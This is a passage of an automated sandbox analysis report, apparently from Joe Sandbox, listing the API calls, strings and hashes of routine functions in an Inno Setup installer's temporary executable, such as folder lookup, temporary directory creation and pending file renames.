                                          • SendMessageA.USER32(00410718,00000080,00000001,00000000), ref: 00423A2D
                                          • GetSystemMenu.USER32(00410718,00000000,00410718,000000FC,00423754,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00400000), ref: 00423A38
                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00410718,00000000,00410718,000000FC,00423754,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00423A47
                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410718,00000000,00410718,000000FC,00423754,00000000,00400000,00000000,00000000,00000000), ref: 00423A54
                                          • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410718,00000000,00410718,000000FC,00423754,00000000,00400000), ref: 00423A6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                          • String ID: D7B
                                          • API String ID: 183575631-2147974278
                                          • Opcode ID: 2a8e1888e4b6b9560ea8b686cbe2eec1ee698867986e389d75447a92090c7769
                                          • Instruction ID: 5219bf6c13a88e3142c9546b93115ce75b520d7afdd4625736ccdd501c9f07f0
                                          • Opcode Fuzzy Hash: 2a8e1888e4b6b9560ea8b686cbe2eec1ee698867986e389d75447a92090c7769
                                          • Instruction Fuzzy Hash: A03152B17412106AEB10BF69DC82F6A33989B04709F60057EBA41FF2D3D9BDE940876D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1958 472410-472466 call 42c4c4 call 403708 call 472204 call 4511c8 1967 472472-472481 call 4511c8 1958->1967 1968 472468-47246d call 451de8 1958->1968 1972 472483-472489 1967->1972 1973 47249b-4724a1 1967->1973 1968->1967 1974 4724ab-4724b3 call 4035dc 1972->1974 1975 47248b-472491 1972->1975 1976 4724a3-4724a9 1973->1976 1977 4724b8-4724cf call 42e250 * 2 1973->1977 1974->1977 1975->1973 1978 472493-472499 1975->1978 1976->1974 1976->1977 1983 4724d4-4724e0 1977->1983 1978->1973 1978->1974 1984 472507-472521 6CAD5550 1983->1984 1985 4724e2-472502 call 407988 call 451de8 1983->1985 1987 472523-472528 call 451de8 1984->1987 1988 47252d-47254a call 403548 * 2 1984->1988 1985->1984 1987->1988
                                          APIs
                                          • 6CAD5550.KERNEL32(73930000,SHGetFolderPathA,00000000,0047254B), ref: 00472512
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550
                                          • String ID: Failed to get address of SHGetFolderPathA function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                          • API String ID: 183293030-1072092678
                                          • Opcode ID: 507d2e34d75453d9ba4edf67155abcdbb15b4d83a88131d6658f2487126d67d1
                                          • Instruction ID: df0b9b8973acef26d11fc0e839acdfe1f99da3c95b5516bf9a2c59f45464ce8d
                                          • Opcode Fuzzy Hash: 507d2e34d75453d9ba4edf67155abcdbb15b4d83a88131d6658f2487126d67d1
                                          • Instruction Fuzzy Hash: 89313E70A00109AFDB10EFE5CAD19DEB7B4EB45304F50C86AE418E7351D7B8AE458B6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • GetLastError.KERNEL32(?,COMMAND.COM" /C ,?,004539C8,004539C8,?,004539C8,00000000,004539AC,?,?,?,00000001), ref: 004538A7
                                            • Part of subcall function 0042D7E0: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00452670,00000000,00452922,?,?,00000000,0048D628,00000004,00000000,00000000,00000000,?,0048AF5D), ref: 0042D7F3
                                          • 6CF47180.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000000,00000000,00000000,?,?,00000000,00453924,?,?,COMMAND.COM" /C ,?), ref: 004538E9
                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000000,00000000,00000000,?,?,00000000,00453924,?,?,COMMAND.COM" /C ,?), ref: 004538FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLast$DirectoryF47180Windows
                                          • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                          • API String ID: 722225226-615399546
                                          • Opcode ID: 33a27229c5421f9eb213ab82141ae6c2ed946a67f5f54968f9def354b9b6ad90
                                          • Instruction ID: 45a4ecfcdb078bc0f7abb9b0e49dfa18ec6bbc905d94cc9751c1a491fcbe52ad
                                          • Opcode Fuzzy Hash: 33a27229c5421f9eb213ab82141ae6c2ed946a67f5f54968f9def354b9b6ad90
                                          • Instruction Fuzzy Hash: 4C5149B1A043096BDB01EF95C841BDEBBB8DF48746F50846BFC04A7292D67C9B49CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 2664 451c94-451ce5 GetModuleHandleA 6CAD5550 GetModuleHandleA 6CAD5550 2665 451ce7-451cee 2664->2665 2666 451cf0-451cf2 2664->2666 2665->2666 2667 451cf4 2665->2667 2668 451cf6-451d2c call 42e250 call 42e6d0 call 403548 2666->2668 2667->2668
                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CB4
                                          • 6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CBA
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CCE
                                          • 6CAD5550.KERNEL32(00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451D2D,?,?,?,?,00000000,?,0048B7AC), ref: 00451CD4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550HandleModule
                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                          • API String ID: 920177481-2130885113
                                          • Opcode ID: b0dbd32f029cef76fb5d07cae0c51c53217107397ee6571f7debf362de99bad9
                                          • Instruction ID: c05cca7271ab2d20bbdb9796339364bf3a64628684ebd0e6fdc7bf04ba31f4de
                                          • Opcode Fuzzy Hash: b0dbd32f029cef76fb5d07cae0c51c53217107397ee6571f7debf362de99bad9
                                          • Instruction Fuzzy Hash: 87015E34641A44AED711AB669C52B6A3B78D714755F600C3BFC019A1A3DABD580C8E2D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • RegisterClipboardFormatA.USER32 ref: 0042FE60
                                          • RegisterClipboardFormatA.USER32 ref: 0042FE6F
                                          • GetCurrentThreadId.KERNEL32 ref: 0042FE89
                                          • GlobalAddAtomA.KERNEL32 ref: 0042FEAA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                          • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                          • API String ID: 4130936913-2943970505
                                          • Opcode ID: 003ea68ac1ad5bea44618dcb6fbfd8367869354155694a8be84db00a992ef707
                                          • Instruction ID: 26ec79deaeb706fa9e15f0cb387365e7e20004fa16731b1cb17c3df66d937657
                                          • Opcode Fuzzy Hash: 003ea68ac1ad5bea44618dcb6fbfd8367869354155694a8be84db00a992ef707
                                          • Instruction Fuzzy Hash: D4F089745183948AD700FB75D84271D77E0AB44708F800A7FF548A62F2E7789504CB2F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadIconA.USER32 ref: 004237E4
                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004190AE,00000000,?,?,00000001,00000000), ref: 00423811
                                          • OemToCharA.USER32 ref: 00423824
                                          • CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004190AE,00000000,?,?,00000001), ref: 00423864
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Char$FileIconLoadLowerModuleName
                                          • String ID: 2$MAINICON
                                          • API String ID: 3935243913-3181700818
                                          • Opcode ID: f7a56db4cabb1daef0da93b146ca5530922bdfff8d5698d8e92f9da91eae2645
                                          • Instruction ID: 1f087940b372d7f1725fe83f28a731a6464074f4c0731806c41e3fd0f529a594
                                          • Opcode Fuzzy Hash: f7a56db4cabb1daef0da93b146ca5530922bdfff8d5698d8e92f9da91eae2645
                                          • Instruction Fuzzy Hash: B8319170A042449ADB10EF69C8C57C97BE8AF15308F4441BAE844DF393D7BED988CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcessId.KERNEL32(00000000), ref: 00419005
                                          • GlobalAddAtomA.KERNEL32 ref: 00419026
                                          • GetCurrentThreadId.KERNEL32 ref: 00419041
                                          • GlobalAddAtomA.KERNEL32 ref: 00419062
                                            • Part of subcall function 00423190: 72E5AC50.USER32(00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001,00000000), ref: 004231E6
                                            • Part of subcall function 00423190: EnumFontsA.GDI32(00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001,00000000), ref: 004231F9
                                            • Part of subcall function 00423190: 72E5AD70.GDI32(00000000,0000005A,00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000,?,?,00000001), ref: 00423201
                                            • Part of subcall function 00423190: 72E5B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423130,00410718,00000000,?,?,00000000,?,0041909B,00000000), ref: 0042320C
                                            • Part of subcall function 00423754: LoadIconA.USER32 ref: 004237E4
                                            • Part of subcall function 00423754: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004190AE,00000000,?,?,00000001,00000000), ref: 00423811
                                            • Part of subcall function 00423754: OemToCharA.USER32 ref: 00423824
                                            • Part of subcall function 00423754: CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004190AE,00000000,?,?,00000001), ref: 00423864
                                            • Part of subcall function 0041F1E0: GetVersion.KERNEL32(?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F1EE
                                            • Part of subcall function 0041F1E0: SetErrorMode.KERNEL32(00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F20A
                                            • Part of subcall function 0041F1E0: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F216
                                            • Part of subcall function 0041F1E0: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F224
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dRegister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F254
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F27D
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F292
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F2A7
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F2BC
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001), ref: 0041F2D1
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000), ref: 0041F2E6
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8), ref: 0041F2FB
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister), ref: 0041F310
                                            • Part of subcall function 0041F1E0: 6CAD5550.KERNEL32(00000001,BtnWndProc3d,00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl), ref: 0041F325
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550$AtomCharCurrentErrorGlobalLoadMode$B380EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                          • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                          • API String ID: 293255337-2767913252
                                          • Opcode ID: b7f9bbeb3c60c5cd610354d66e429f187f1188d2ad776fc62a728a79e0fe9ed2
                                          • Instruction ID: 43a8d0485271cdf29850ede6b3e0bb29e96d7f982bc1287e513e001800c06e39
                                          • Opcode Fuzzy Hash: b7f9bbeb3c60c5cd610354d66e429f187f1188d2ad776fc62a728a79e0fe9ed2
                                          • Instruction Fuzzy Hash: C711FE70A092809AC740FF7A988664E77D09B9830CF40893FF548BB3E1DB7999458B5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: LongWindow$Prop
                                          • String ID:
                                          • API String ID: 3887896539-0
                                          • Opcode ID: c6d8841ac761625ea1a08a171b6c7f9a9a5b30f625edd39c9678ca1475cce204
                                          • Instruction ID: 17f789917bd6404cc509f75547e6dc433186a7dca0d07f336397386fd0c13113
                                          • Opcode Fuzzy Hash: c6d8841ac761625ea1a08a171b6c7f9a9a5b30f625edd39c9678ca1475cce204
                                          • Instruction Fuzzy Hash: 2611CEB5601148BFDB00EF99DC84E9A3BE9AB08354F10866AFE18DB2E1D735D9508B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00454013,?,00000000,00454053), ref: 00453F59
                                          Strings
                                          • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00453EDC
                                          • WININIT.INI, xrefs: 00453F88
                                          • PendingFileRenameOperations2, xrefs: 00453F28
                                          • PendingFileRenameOperations, xrefs: 00453EF8
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseD6790
                                          • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                          • API String ID: 3513276378-2199428270
                                          • Opcode ID: 1445041b127030f601f5f475d0f81f462f3f7857b8dd74538295b2e9aeb85ebb
                                          • Instruction ID: 7ba13c9c2ff66a0e977248546e57251473cb921e98e5fc860cbc8d5f373c0d82
                                          • Opcode Fuzzy Hash: 1445041b127030f601f5f475d0f81f462f3f7857b8dd74538295b2e9aeb85ebb
                                          • Instruction Fuzzy Hash: 1F51F930E002089BDB10EF61DC51ADEB7B9EF84708F60817BF904A72D2DB799E45CA18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SHGetFileInfo.SHELL32([rG,00000010,?,00000160,00001010), ref: 00461179
                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 0046119F
                                            • Part of subcall function 0046101C: DrawIconEx.USER32 ref: 004610B4
                                            • Part of subcall function 0046101C: DestroyCursor.USER32(00000000), ref: 004610CA
                                          • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 004611FB
                                          • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00461221
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Icon$ExtractFileInfo$CursorDestroyDraw
                                          • String ID: [rG
                                          • API String ID: 2926980410-1780078340
                                          • Opcode ID: 1f42779bc9d7f459df7c4a952db4a5d2d9c1b39d754ee803a783439597452981
                                          • Instruction ID: 43efc87ec513c33b4470f0c42580a1d3a797498daa76b4594f75f2d001bc2c3a
                                          • Opcode Fuzzy Hash: 1f42779bc9d7f459df7c4a952db4a5d2d9c1b39d754ee803a783439597452981
                                          • Instruction Fuzzy Hash: 27416D74600248AFDB10DF65CD9AFDEB7E8EB49304F1481A6F904E7391D678AE80CB59
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004723B2,?,?,?,?,00000000,00000000,?,0048A000,00000005,?,00000000,00489F25), ref: 004722EF
                                          • GetLastError.KERNEL32(00000000,00000000,00000000,004723B2,?,?,?,?,00000000,00000000,?,0048A000,00000005,?,00000000,00489F25), ref: 004722F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                          • API String ID: 1375471231-2952887711
                                          • Opcode ID: d4e5f0a15b5712561890722fd7a3cf30839d0f46d90f646290125f0554c3378f
                                          • Instruction ID: 6b17bfcab048c2f4aa4ef564a62664cf3a994c609fd9f7540fc313dadf2ad4ec
                                          • Opcode Fuzzy Hash: d4e5f0a15b5712561890722fd7a3cf30839d0f46d90f646290125f0554c3378f
                                          • Instruction Fuzzy Hash: 79414674A002199BDB10EFA5C981ADEB7B5EF44304F50847BE810B7392D67CAE45CB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EnumWindows.USER32(00423AE4), ref: 00423B70
                                          • GetWindow.USER32(?,00000003), ref: 00423B85
                                          • GetWindowLongA.USER32 ref: 00423B94
                                          • SetWindowPos.USER32(00000000,$BB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,00424273,?,?,00423E3B), ref: 00423BCA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$EnumLongWindows
                                          • String ID: $BB
                                          • API String ID: 4191631535-2593667605
                                          • Opcode ID: d6e0cba7910d819887bb3b6b5c2b8e697feec83489dcab8192dc57f6bf28c793
                                          • Instruction ID: ebb4f15abd13bc88932ccb723061018f00c5171692ad1176cd7ff3742fecbb00
                                          • Opcode Fuzzy Hash: d6e0cba7910d819887bb3b6b5c2b8e697feec83489dcab8192dc57f6bf28c793
                                          • Instruction Fuzzy Hash: ED111870744624ABDA10AF28D885F5677E8AB08725F11066AF954EB2E2C378AD41CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 0042DCE8
                                          • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE6B,00000000,0042DE83,?,?,?,?), ref: 0042DD03
                                          • 6CAD5550.KERNEL32(00000000,advapi32.dll,RegDeleteKeyExA,?,00000000,0042DE6B,00000000,0042DE83,?,?,?,?), ref: 0042DD09
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
